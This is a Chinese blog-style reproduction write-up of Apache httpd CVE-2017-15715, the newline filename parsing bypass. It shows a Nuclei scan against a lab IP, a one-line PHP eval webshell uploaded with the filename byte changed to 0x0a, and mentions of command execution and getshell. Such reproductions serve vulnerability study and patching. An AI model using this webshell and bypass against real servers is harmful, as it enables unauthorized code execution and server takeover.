apache-httpd_换行解析漏洞_CVE-2017-15715

这篇文章详细描述了ApacheHTTPD2.4.0至2.4.29版本中的一个高危漏洞,该漏洞允许通过换行符绕过安全策略,进行PHP文件解析和命令执行。通过Nuclei工具可扫描并验证漏洞,建议及时升级以修复这一问题。
摘要由CSDN通过智能技术生成

apache-httpd_换行解析漏洞_CVE-2017-15715

说明内容
漏洞编号CVE-2017-15715
漏洞名称apache-httpd 换行解析漏洞
漏洞评级高危
影响范围Apache HTTPd 2.4.0~2.4.29
漏洞描述apache 在修复第一个后缀名解析漏洞时,绕过一些服务器的安全策略
修复方案升级

漏洞描述

Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。

漏洞等级

高危

影响版本

  • Apache HTTPd 2.4.0~2.4.29

漏洞复现

基础环境

组件版本
OSkali-linux
Web Serverchrome
apache httpd2.4.0

漏洞扫描

使用nuclei工具可以扫描到

./nuclei -u 192.168.117.163

在这里插入图片描述

漏洞验证

  1. 启动环境,访问网站

    在这里插入图片描述

  2. 上传文件,内容为一句话木马+phpinfo,格式为.php,进行抓包

    <?php @eval($_REQUEST[777]);phpinfo(); ?>
    

    在这里插入图片描述

  3. 在文件名1_info.php后加一个.,为了之后好找

    1_info.php.
    

    在这里插入图片描述

  4. 查看16进制编码,找到刚刚添加的.,编码为2e

    在这里插入图片描述

  5. 将2e修改为0a,进行发包

    在这里插入图片描述

  6. 访问刚刚上传的1_info.php%0a

    http://192.168.117.163/1_info.php%0a
    

    在这里插入图片描述

深度利用

命令执行

可以通过修改php文件内容进行命令执行

GetShell

可以通过上传木马getshell

漏洞挖掘

网络测绘

apache httpd

修复建议

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

cwangc000

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值